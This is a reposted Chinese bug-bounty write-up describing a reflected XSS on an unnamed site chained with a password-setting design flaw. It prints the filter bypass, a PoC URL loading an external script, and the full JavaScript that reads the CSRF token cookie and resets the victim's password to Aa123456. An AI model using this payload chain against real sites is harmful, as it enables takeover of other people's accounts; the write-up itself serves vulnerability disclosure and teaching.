最近在挖SRC,记录一下一些有趣的漏洞
这个站同样没发现什么大的问题,这也是最近几天第三次挖掘该站了,在网站的各个地方输出都做了转义,一般来说并不会出现XSS,不过今天测试时开了两个浏览器窗口,当我在其中一个窗口重置密码时,发现另一个窗口出现了弹窗提示
看到url和提示框中一致的id时觉得这里大有文章可做
测试下特殊符号,发现这里输出同样也会转义
一般到此可能就会放弃了,不过幸好我随手多试了一下,发现一个完整的标签竟然没有转义
然后很快的输入弹窗payload
<img src=x onerror='alert(1)'>发现直接被过滤了
继续盲测,也很简单就饶了过去,用script标签
另外在该网站有一处设计缺陷,便是手机注册的用户默认都没有密码,而且在个人中心可以直接设置新密码,当然有csrf_token保护,所以不能csrf攻击,不过结合XSS的话便可以直接修改他人密码了
在用xss构造修改密码的表单时,用script src指向外部js文件更加方便,但是发现依旧和之前过滤img src=x的情况一样,前端显示undefined,后面发现是是自己疏忽了,等号url编码后即可
<script src%3d"xxx"></script>最后poc,打开即可修改密码为Aa123456
https://xxxx/login?userId=%3Cscript%20src%3d%22https://l3yx.github.io/resource/vul.js?123123%22%3E%3C/script%3Evul.js
function getcookie(objname){var arrstr = document.cookie.split("; ");for(var i = 0;i < arrstr.length;i ++){var temp = arrstr[i].split("=");if(temp[0] == objname) return unescape(temp[1]);}}var csrf_token=getcookie("csrf_token");if(!csrf_token){csrf_token=""}var xmlhttp;if (window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}xmlhttp.open("POST","/api/user/set_password",true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("csrf_token="+csrf_token+"¤t=&password=Aa123456&confirm=Aa123456");
推荐阅读
实战 | 我是如何通过 JS 文件入侵管理面板获得美元赏金的
点赞,转发,在看
文章来源于:l3yx.github.io
作者:l3yx
如有侵权,请联系删除
原文始发于微信公众号(HACK学习君):实战 | 记一次反射型XSS+设计缺陷修改任意用户密码挖掘过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论